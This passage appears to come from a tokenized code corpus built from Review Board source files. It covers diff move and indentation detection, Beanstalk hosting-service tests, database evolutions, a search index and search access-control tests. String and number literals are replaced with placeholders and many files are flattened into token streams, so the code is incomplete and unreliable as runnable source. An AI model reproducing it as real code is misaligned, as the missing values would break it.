interdiff ) <EOL> for opcode in opcodes : <EOL> yield opcode <EOL> def _generate_opcode_meta ( self , opcodes ) : <EOL> for tag , i1 , i2 , j1 , j2 in opcodes : <EOL> meta = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> if tag == '<STR_LIT:replace>' : <EOL> assert ( i2 - i1 ) == ( j2 - j1 ) <EOL> for i , j in zip ( range ( i1 , i2 ) , range ( j1 , j2 ) ) : <EOL> if ( self . WHITESPACE_RE . sub ( '<STR_LIT>' , self . differ . a [ i ] ) == <EOL> self . WHITESPACE_RE . sub ( '<STR_LIT>' , self . differ . b [ j ] ) ) : <EOL> meta [ '<STR_LIT>' ] . append ( ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) ) <EOL> if len ( meta [ '<STR_LIT>' ] ) == ( i2 - i1 ) : <EOL> meta [ '<STR_LIT>' ] = True <EOL> elif tag == '<STR_LIT>' : <EOL> for group in self . _compute_chunk_indentation ( i1 , i2 , j1 , j2 ) : <EOL> ii1 , ii2 , ij1 , ij2 , indentation_changes = group <EOL> if indentation_changes : <EOL> new_meta = dict ( { <EOL> '<STR_LIT>' : indentation_changes , <EOL> } , ** meta ) <EOL> else : <EOL> new_meta = meta <EOL> yield tag , ii1 , ii2 , ij1 , ij2 , new_meta <EOL> continue <EOL> yield tag , i1 , i2 , j1 , j2 , meta <EOL> def _apply_meta_processors ( self , opcodes ) : <EOL> if self . interdiff : <EOL> opcodes = post_process_filtered_equals ( opcodes ) <EOL> for opcode in opcodes : <EOL> yield opcode <EOL> def _group_opcodes ( self , opcodes ) : <EOL> for group_index , group in enumerate ( opcodes ) : <EOL> self . groups . append ( group ) <EOL> tag = group [ <NUM_LIT:0> ] <EOL> if tag in ( '<STR_LIT>' , '<STR_LIT:replace>' ) : <EOL> i1 = group [ <NUM_LIT:1> ] <EOL> i2 = group [ <NUM_LIT:2> ] <EOL> for i in range ( i1 , i2 ) : <EOL> line = self . differ . a [ i ] . strip ( ) <EOL> if line : <EOL> self . removes . setdefault ( line , [ ] ) . append ( <EOL> ( i , group , group_index ) ) <EOL> if tag in ( '<STR_LIT>' , '<STR_LIT:replace>' ) : <EOL> self . inserts . 
append ( group ) <EOL> def _compute_chunk_indentation ( self , i1 , i2 , j1 , j2 ) : <EOL> indentation_changes = { } <EOL> prev_has_indent = False <EOL> prev_start_i = i1 <EOL> prev_start_j = j1 <EOL> for i , j in zip ( range ( i1 , i2 ) , range ( j1 , j2 ) ) : <EOL> old_line = self . differ . a [ i ] <EOL> new_line = self . differ . b [ j ] <EOL> new_indentation_changes = { } <EOL> indent_info = self . _compute_line_indentation ( old_line , new_line ) <EOL> has_indent = indent_info is not None <EOL> if has_indent : <EOL> key = '<STR_LIT>' % ( i + <NUM_LIT:1> , j + <NUM_LIT:1> ) <EOL> new_indentation_changes [ key ] = indent_info <EOL> if has_indent != prev_has_indent : <EOL> if prev_start_i != i or prev_start_j != j : <EOL> yield prev_start_i , i , prev_start_j , j , indentation_changes <EOL> prev_start_i = i <EOL> prev_start_j = j <EOL> prev_has_indent = has_indent <EOL> indentation_changes = new_indentation_changes <EOL> elif has_indent : <EOL> indentation_changes . update ( new_indentation_changes ) <EOL> if prev_start_i != i2 or prev_start_j != j2 : <EOL> yield prev_start_i , i2 , prev_start_j , j2 , indentation_changes <EOL> def _compute_line_indentation ( self , old_line , new_line ) : <EOL> if old_line == new_line : <EOL> return None <EOL> old_line_stripped = old_line . lstrip ( ) <EOL> new_line_stripped = new_line . lstrip ( ) <EOL> old_line_indent_len = len ( old_line ) - len ( old_line_stripped ) <EOL> new_line_indent_len = len ( new_line ) - len ( new_line_stripped ) <EOL> old_line_indent = old_line [ : old_line_indent_len ] <EOL> new_line_indent = new_line [ : new_line_indent_len ] <EOL> norm_old_line_indent = old_line_indent . expandtabs ( self . TAB_SIZE ) <EOL> norm_new_line_indent = new_line_indent . expandtabs ( self . 
TAB_SIZE ) <EOL> norm_old_line_indent_len = len ( norm_old_line_indent ) <EOL> norm_new_line_indent_len = len ( norm_new_line_indent ) <EOL> norm_old_line_len = ( norm_old_line_indent_len + <EOL> len ( old_line_stripped ) ) <EOL> norm_new_line_len = ( norm_new_line_indent_len + <EOL> len ( new_line_stripped ) ) <EOL> line_len_diff = norm_new_line_len - norm_old_line_len <EOL> if line_len_diff == <NUM_LIT:0> : <EOL> return None <EOL> is_indent = ( line_len_diff > <NUM_LIT:0> ) <EOL> if is_indent : <EOL> raw_indent_len = new_line_indent_len <EOL> else : <EOL> raw_indent_len = old_line_indent_len <EOL> raw_indent_len -= len ( os . path . commonprefix ( [ <EOL> old_line_indent [ : : - <NUM_LIT:1> ] , <EOL> new_line_indent [ : : - <NUM_LIT:1> ] , <EOL> ] ) ) <EOL> return ( is_indent , <EOL> raw_indent_len , <EOL> abs ( norm_old_line_indent_len - norm_new_line_indent_len ) ) <EOL> def _compute_moves ( self ) : <EOL> for insert in self . inserts : <EOL> self . _compute_move_for_insert ( * insert ) <EOL> def _compute_move_for_insert ( self , itag , ii1 , ii2 , ij1 , ij2 , imeta ) : <EOL> i_move_cur = ij1 <EOL> i_move_range = MoveRange ( i_move_cur , i_move_cur ) <EOL> r_move_ranges = { } <EOL> move_key = None <EOL> is_replace = ( itag == '<STR_LIT:replace>' ) <EOL> while i_move_cur < ij2 : <EOL> try : <EOL> iline = self . differ . b [ i_move_cur ] . strip ( ) <EOL> except IndexError : <EOL> iline = None <EOL> updated_range = False <EOL> if iline and iline in self . removes : <EOL> for ri , rgroup , rgroup_index in self . removes . get ( iline , [ ] ) : <EOL> r_move_range = r_move_ranges . get ( move_key ) <EOL> if not r_move_range or ri != r_move_range . end + <NUM_LIT:1> : <EOL> move_key = '<STR_LIT>' % rgroup [ <NUM_LIT:1> : <NUM_LIT:5> ] <EOL> r_move_range = r_move_ranges . get ( move_key ) <EOL> if r_move_range : <EOL> if ri == r_move_range . end + <NUM_LIT:1> : <EOL> r_move_range . end = ri <EOL> r_move_range . 
add_group ( rgroup , rgroup_index ) <EOL> updated_range = True <EOL> else : <EOL> if not is_replace or i_move_cur - ij1 != ri - ii1 : <EOL> r_move_ranges [ move_key ] = MoveRange ( ri , ri , [ ( rgroup , rgroup_index ) ] ) <EOL> updated_range = True <EOL> if not updated_range and r_move_ranges : <EOL> i_move_cur -= <NUM_LIT:1> <EOL> move_key = None <EOL> elif iline == '<STR_LIT>' and move_key : <EOL> r_move_range = r_move_ranges . get ( move_key ) <EOL> if r_move_range : <EOL> new_end_i = r_move_range . end + <NUM_LIT:1> <EOL> if ( new_end_i < len ( self . differ . a ) and <EOL> self . differ . a [ new_end_i ] . strip ( ) == '<STR_LIT>' ) : <EOL> r_move_range . end = new_end_i <EOL> last_group , last_group_index = r_move_range . last_group <EOL> if new_end_i >= last_group [ <NUM_LIT:2> ] : <EOL> cur_group_index = r_move_range . last_group [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> r_move_range . add_group ( <EOL> self . groups [ cur_group_index ] , <EOL> cur_group_index ) <EOL> updated_range = True <EOL> i_move_cur += <NUM_LIT:1> <EOL> if not updated_range or i_move_cur == ij2 : <EOL> if r_move_ranges : <EOL> r_move_range = self . _find_longest_move_range ( r_move_ranges ) <EOL> r_move_range = self . _determine_move_range ( r_move_range ) <EOL> if r_move_range : <EOL> i_range = range ( i_move_range . start + <NUM_LIT:1> , <EOL> i_move_cur + <NUM_LIT:1> ) <EOL> r_range = range ( r_move_range . start + <NUM_LIT:1> , <EOL> r_move_range . end + <NUM_LIT:2> ) <EOL> moved_to_ranges = dict ( zip ( r_range , i_range ) ) <EOL> for group , group_index in r_move_range . groups : <EOL> rmeta = group [ - <NUM_LIT:1> ] <EOL> rmeta . setdefault ( '<STR_LIT>' , { } ) . update ( <EOL> moved_to_ranges ) <EOL> imeta . setdefault ( '<STR_LIT>' , { } ) . 
update ( <EOL> dict ( zip ( i_range , r_range ) ) ) <EOL> move_key = None <EOL> i_move_range = MoveRange ( i_move_cur , i_move_cur ) <EOL> r_move_ranges = { } <EOL> def _find_longest_move_range ( self , r_move_ranges ) : <EOL> r_move_range = None <EOL> for iter_move_range in six . itervalues ( r_move_ranges ) : <EOL> if not r_move_range : <EOL> r_move_range = iter_move_range <EOL> else : <EOL> len1 = r_move_range . end - r_move_range . start <EOL> len2 = iter_move_range . end - iter_move_range . start <EOL> if len1 < len2 : <EOL> r_move_range = iter_move_range <EOL> elif len1 == len2 : <EOL> r_move_range = None <EOL> return r_move_range <EOL> def _determine_move_range ( self , r_move_range ) : <EOL> """<STR_LIT>""" <EOL> if not r_move_range : <EOL> return None <EOL> end_i = r_move_range . end <EOL> lines = self . differ . a [ r_move_range . start : end_i + <NUM_LIT:1> ] <EOL> new_end_i = None <EOL> valid = False <EOL> for i , line in enumerate ( reversed ( lines ) ) : <EOL> line = line . strip ( ) <EOL> if line : <EOL> if len ( line ) >= <NUM_LIT:4> and self . ALPHANUM_RE . search ( line ) : <EOL> valid = True <EOL> if new_end_i is None or valid : <EOL> new_end_i = end_i - i <EOL> if valid : <EOL> break <EOL> valid = ( <EOL> valid and <EOL> ( new_end_i - r_move_range . start + <NUM_LIT:1> >= <EOL> self . MOVE_PREFERRED_MIN_LINES or <EOL> len ( self . differ . a [ r_move_range . start ] . strip ( ) ) >= <EOL> self . MOVE_MIN_LINE_LENGTH ) ) <EOL> if not valid : <EOL> return None <EOL> assert new_end_i is not None <EOL> return MoveRange ( r_move_range . start , new_end_i , r_move_range . 
groups ) <EOL> _generator = DiffOpcodeGenerator <EOL> def get_diff_opcode_generator_class ( ) : <EOL> """<STR_LIT>""" <EOL> return _generator <EOL> def set_diff_opcode_generator_class ( renderer ) : <EOL> """<STR_LIT>""" <EOL> assert renderer <EOL> globals ( ) [ '<STR_LIT>' ] = renderer <EOL> def get_diff_opcode_generator ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _generator ( * args , ** kwargs ) </s>
from __future__ import unicode_literals

# Ordered list of database evolution names for this app (the names are
# placeholder literals in this view).
SEQUENCE = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]
from __future__ import unicode_literals
from django.utils.six.moves.urllib.error import HTTPError
from reviewboard.hostingsvcs.tests.testcases import ServiceTests
from reviewboard.scmtools.models import Repository, Tool


class BeanstalkTests(ServiceTests):
    """Unit tests for the Beanstalk hosting service integration.

    HTTP calls are faked via spy_on(..., call_fake=...), so no network
    access happens.  Expected URLs/payloads are placeholder literals in
    this view.
    """

    service_name = '<STR_LIT>'
    fixtures = ['<STR_LIT>']

    def test_service_support(self):
        """Testing the service's capability flags."""
        self.assertFalse(self.service_class.supports_bug_trackers)
        self.assertTrue(self.service_class.supports_repositories)

    def test_repo_field_values_git(self):
        """Testing the generated repository field values for Git."""
        fields = self._get_repository_fields('<STR_LIT>', fields={
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        })
        self.assertEqual(
            fields['<STR_LIT:path>'],
            '<STR_LIT>')
        self.assertEqual(
            fields['<STR_LIT>'],
            '<STR_LIT>')

    def test_repo_field_values_subversion(self):
        """Testing the generated repository field values for Subversion.

        Unlike Git, no mirror-path field is expected.
        """
        fields = self._get_repository_fields('<STR_LIT>', fields={
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        })
        self.assertEqual(
            fields['<STR_LIT:path>'],
            '<STR_LIT>')
        self.assertNotIn('<STR_LIT>', fields)

    def test_authorize(self):
        """Testing that authorize() stores credentials (not in plain text)."""
        account = self._get_hosting_account()
        service = account.service
        self.assertFalse(service.is_authorized())
        service.authorize('<STR_LIT>', '<STR_LIT>', None)
        self.assertIn('<STR_LIT:password>', account.data)
        # The stored value must not be the raw password.
        self.assertNotEqual(account.data['<STR_LIT:password>'], '<STR_LIT>')
        self.assertTrue(service.is_authorized())

    def test_check_repository(self):
        """Testing repository validation against the expected API URL."""
        def _http_get(service, url, *args, **kwargs):
            self.assertEqual(
                url,
                '<STR_LIT>'
                '<STR_LIT>')
            return '<STR_LIT:{}>', {}

        account = self._get_hosting_account()
        service = account.service
        service.authorize('<STR_LIT>', '<STR_LIT>', None)
        self.spy_on(service.client.http_get, call_fake=_http_get)
        service.check_repository(beanstalk_account_domain='<STR_LIT>',
                                 beanstalk_repo_name='<STR_LIT>')
        self.assertTrue(service.client.http_get.called)

    def test_get_file_with_svn_and_base_commit_id(self):
        """Testing get_file() for SVN when a base commit ID is given."""
        self._test_get_file(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id='<STR_LIT>',
            expected_revision='<STR_LIT>')

    def test_get_file_with_svn_and_revision(self):
        """Testing get_file() for SVN with only a revision."""
        self._test_get_file(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id=None,
            expected_revision='<STR_LIT>')

    def test_get_file_with_git_and_base_commit_id(self):
        """Testing get_file() for Git when a base commit ID is given."""
        self._test_get_file(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id='<STR_LIT>',
            expected_revision='<STR_LIT>')

    def test_get_file_with_git_and_revision(self):
        """Testing get_file() for Git with only a revision."""
        self._test_get_file(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id=None,
            expected_revision='<STR_LIT>')

    def test_get_file_exists_with_svn_and_base_commit_id(self):
        """Testing get_file_exists() for SVN with a base commit ID."""
        self._test_get_file_exists(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id='<STR_LIT>',
            expected_revision='<STR_LIT>',
            expected_found=True)

    def test_get_file_exists_with_svn_and_revision(self):
        """Testing get_file_exists() for SVN with only a revision."""
        self._test_get_file_exists(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id=None,
            expected_revision='<STR_LIT>',
            expected_found=True)

    def test_get_file_exists_with_git_and_base_commit_id(self):
        """Testing get_file_exists() for Git with a base commit ID."""
        self._test_get_file_exists(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id='<STR_LIT>',
            expected_revision='<STR_LIT>',
            expected_found=True)

    def test_get_file_exists_with_git_and_revision(self):
        """Testing get_file_exists() for Git with only a revision."""
        self._test_get_file_exists(
            tool_name='<STR_LIT>',
            revision='<STR_LIT>',
            base_commit_id=None,
            expected_revision='<STR_LIT>',
            expected_found=True)

    def _test_get_file(self, tool_name, revision, base_commit_id,
                       expected_revision):
        """Common driver for the get_file() tests.

        Fakes http_get, asserting the URL built for the given tool and
        expected revision, and checks the returned file contents.
        """
        def _http_get(service, url, *args, **kwargs):
            if tool_name == '<STR_LIT>':
                self.assertEqual(
                    url,
                    '<STR_LIT>'
                    '<STR_LIT>'
                    % expected_revision)
                payload = b'<STR_LIT>'
            else:
                self.assertEqual(
                    url,
                    '<STR_LIT>'
                    '<STR_LIT>'
                    % expected_revision)
                payload = b'<STR_LIT>'
            return payload, {}

        account = self._get_hosting_account()
        service = account.service
        repository = Repository(hosting_account=account,
                                tool=Tool.objects.get(name=tool_name))
        repository.extra_data = {
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        service.authorize('<STR_LIT>', '<STR_LIT>', None)
        self.spy_on(service.client.http_get, call_fake=_http_get)
        result = service.get_file(repository, '<STR_LIT>', revision,
                                  base_commit_id)
        self.assertTrue(service.client.http_get.called)
        self.assertEqual(result, '<STR_LIT>')

    def _test_get_file_exists(self, tool_name, revision, base_commit_id,
                              expected_revision, expected_found):
        """Common driver for the get_file_exists() tests.

        Fakes http_get, asserting the URL; raises HTTPError to simulate a
        missing file when ``expected_found`` is False.

        NOTE(review): ``HTTPError()`` is raised with no arguments here --
        confirm that works on the targeted Python version.
        """
        def _http_get(service, url, *args, **kwargs):
            expected_url = ('<STR_LIT>'
                            '<STR_LIT>')
            if not base_commit_id and tool_name == '<STR_LIT>':
                expected_url += '<STR_LIT>' % expected_revision
            else:
                expected_url += ('<STR_LIT>'
                                 % expected_revision)
            self.assertEqual(url, expected_url)
            if expected_found:
                return b'<STR_LIT:{}>', {}
            else:
                raise HTTPError()

        account = self._get_hosting_account()
        service = account.service
        repository = Repository(hosting_account=account,
                                tool=Tool.objects.get(name=tool_name))
        repository.extra_data = {
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        }
        service.authorize('<STR_LIT>', '<STR_LIT>', None)
        self.spy_on(service.client.http_get, call_fake=_http_get)
        result = service.get_file_exists(repository, '<STR_LIT>', revision,
                                         base_commit_id)
        self.assertTrue(service.client.http_get.called)
        self.assertEqual(result, expected_found)
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from django import forms <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from djblets . integrations . forms import ( IntegrationConfigForm as <EOL> DjbletsIntegrationConfigForm ) <EOL> from reviewboard . site . models import LocalSite <EOL> class IntegrationConfigForm ( DjbletsIntegrationConfigForm ) : <EOL> """<STR_LIT>""" <EOL> model_fields = ( <EOL> DjbletsIntegrationConfigForm . model_fields + <EOL> ( '<STR_LIT>' , ) <EOL> ) <EOL> local_site = forms . ModelChoiceField ( <EOL> label = _ ( '<STR_LIT>' ) , <EOL> queryset = LocalSite . objects . all ( ) , <EOL> required = False ) </s>
from __future__ import unicode_literals
from django_evolution.mutations import AddField
from djblets.db.fields import JSONField

# Database evolution: adds two nullable JSONField columns.  Model/field
# names are placeholder literals in this view.
MUTATIONS = [
    AddField('<STR_LIT>', '<STR_LIT>', JSONField, null=True),
    AddField('<STR_LIT>', '<STR_LIT>', JSONField, null=True),
]
from __future__ import unicode_literals
from django_evolution.mutations import AddField

from django.db import models

# Database evolution: adds six BooleanField columns, all with an initial
# value of False.  Model/field names are placeholder literals in this
# view.
MUTATIONS = [
    AddField('<STR_LIT>', '<STR_LIT>', models.BooleanField,
             initial=False),
    AddField('<STR_LIT>', '<STR_LIT>', models.BooleanField,
             initial=False),
    AddField('<STR_LIT>', '<STR_LIT>', models.BooleanField,
             initial=False),
    AddField('<STR_LIT>', '<STR_LIT>', models.BooleanField, initial=False),
    AddField('<STR_LIT>', '<STR_LIT>', models.BooleanField, initial=False),
    AddField('<STR_LIT>', '<STR_LIT>', models.BooleanField,
             initial=False)
]
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import AnonymousUser <EOL> from django . db . models import Q <EOL> from djblets . util . templatetags . djblets_utils import user_displayname <EOL> from haystack import indexes <EOL> from reviewboard . reviews . models import ReviewRequest <EOL> from reviewboard . search . indexes import BaseSearchIndex <EOL> class ReviewRequestIndex ( BaseSearchIndex , indexes . Indexable ) : <EOL> """<STR_LIT>""" <EOL> model = ReviewRequest <EOL> local_site_attr = '<STR_LIT>' <EOL> review_request_id = indexes . IntegerField ( model_attr = '<STR_LIT>' ) <EOL> summary = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> description = indexes . CharField ( model_attr = '<STR_LIT:description>' ) <EOL> testing_done = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> bug = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> username = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> user_display_name = indexes . CharField ( ) <EOL> author = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> last_updated = indexes . DateTimeField ( model_attr = '<STR_LIT>' ) <EOL> url = indexes . CharField ( model_attr = '<STR_LIT>' ) <EOL> file = indexes . CharField ( ) <EOL> private = indexes . BooleanField ( ) <EOL> private_repository_id = indexes . IntegerField ( ) <EOL> private_target_groups = indexes . MultiValueField ( ) <EOL> target_users = indexes . MultiValueField ( ) <EOL> def get_model ( self ) : <EOL> """<STR_LIT>""" <EOL> return ReviewRequest <EOL> def get_updated_field ( self ) : <EOL> return '<STR_LIT>' <EOL> def index_queryset ( self , using = None ) : <EOL> """<STR_LIT>""" <EOL> queryset = self . get_model ( ) . objects . public ( <EOL> status = None , <EOL> extra_query = Q ( status = '<STR_LIT:P>' ) | Q ( status = '<STR_LIT:S>' ) , <EOL> show_all_local_sites = True , <EOL> filter_private = False ) <EOL> queryset = queryset . 
select_related ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> queryset = queryset . prefetch_related ( <EOL> '<STR_LIT>' ) <EOL> return queryset <EOL> def prepare_file ( self , obj ) : <EOL> return set ( [ <EOL> ( filediff . source_file , filediff . dest_file ) <EOL> for diffset in obj . diffset_history . diffsets . all ( ) <EOL> for filediff in diffset . files . all ( ) <EOL> ] ) <EOL> def prepare_private ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> return not review_request . is_accessible_by ( AnonymousUser ( ) , <EOL> silent = True ) <EOL> def prepare_private_repository_id ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> if review_request . repository and not review_request . repository . public : <EOL> return review_request . repository_id <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def prepare_private_target_groups ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> queryset = review_request . target_groups . filter ( invite_only = True ) <EOL> return list ( queryset . values_list ( '<STR_LIT>' , flat = True ) ) or [ <NUM_LIT:0> ] <EOL> def prepare_target_users ( self , review_request ) : <EOL> """<STR_LIT>""" <EOL> pks = list ( review_request . target_people . values_list ( '<STR_LIT>' , flat = True ) ) <EOL> return pks or [ <NUM_LIT:0> ] <EOL> def prepare_user_display_name ( self , obj ) : <EOL> return user_displayname ( obj . submitter ) </s>
<s> from __future__ import unicode_literals <EOL> from django_evolution . mutations import AddField , ChangeMeta <EOL> from django . db import models <EOL> MUTATIONS = [ <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . BooleanField , initial = False ) , <EOL> AddField ( '<STR_LIT>' , '<STR_LIT>' , models . DateTimeField , <EOL> null = True ) , <EOL> ChangeMeta ( '<STR_LIT>' , '<STR_LIT>' , <EOL> ( ( '<STR_LIT:name>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:path>' , '<STR_LIT>' ) ) ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . sites . models import Site <EOL> from django . core . management import call_command <EOL> from djblets . siteconfig . models import SiteConfiguration <EOL> from djblets . testing . decorators import add_fixtures <EOL> from reviewboard . admin . server import build_server_url <EOL> from reviewboard . admin . siteconfig import load_site_config <EOL> from reviewboard . site . urlresolvers import local_site_reverse <EOL> from reviewboard . testing . testcase import TestCase <EOL> class SearchTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> siteconfig = SiteConfiguration . objects . get_current ( ) <EOL> siteconfig . set ( '<STR_LIT>' , True ) <EOL> siteconfig . save ( ) <EOL> load_site_config ( ) <EOL> def test_search_all ( self ) : <EOL> """<STR_LIT>""" <EOL> review_request = self . create_review_request ( submitter = '<STR_LIT>' , <EOL> publish = True ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . username , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:1> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:1> ] . summary , review_request . summary ) <EOL> def test_filter_review_requests ( self ) : <EOL> """<STR_LIT>""" <EOL> review_request = self . create_review_request ( submitter = '<STR_LIT>' , <EOL> publish = True ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' , filter_by = '<STR_LIT>' ) <EOL> context = response . context <EOL> self . 
assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def test_filter_users ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_review_request ( submitter = '<STR_LIT>' , publish = True ) <EOL> self . reindex ( ) <EOL> response = self . search ( '<STR_LIT>' , filter_by = '<STR_LIT>' ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . username , '<STR_LIT>' ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_without_private_repo_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repo_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . users . add ( user ) <EOL> review_request = self . 
create_review_request ( repository = repository , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repo_access_through_group ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> group . users . add ( user ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . review_groups . add ( group ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> def test_review_requests_without_private_group_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> review_request = self . 
create_review_request ( publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> def test_review_requests_with_private_group_access ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> group . users . add ( user ) <EOL> review_request = self . create_review_request ( publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> self . assertTrue ( review_request . is_accessible_by ( user ) ) <EOL> self . reindex ( ) <EOL> response = self . search ( review_request . summary ) <EOL> context = response . context <EOL> self . assertEqual ( context [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> results = context [ '<STR_LIT>' ] . object_list <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . content_type ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . summary , review_request . summary ) <EOL> @ add_fixtures ( [ '<STR_LIT>' ] ) <EOL> def test_review_requests_with_private_repo_access_no_private_group ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = User . objects . get ( username = '<STR_LIT>' ) <EOL> group = self . create_review_group ( invite_only = True ) <EOL> repository = self . create_repository ( public = False ) <EOL> repository . users . add ( user ) <EOL> review_request = self . create_review_request ( repository = repository , <EOL> publish = True ) <EOL> review_request . target_groups . add ( group ) <EOL> self . assertFalse ( review_request . is_accessible_by ( user ) ) <EOL> self . 
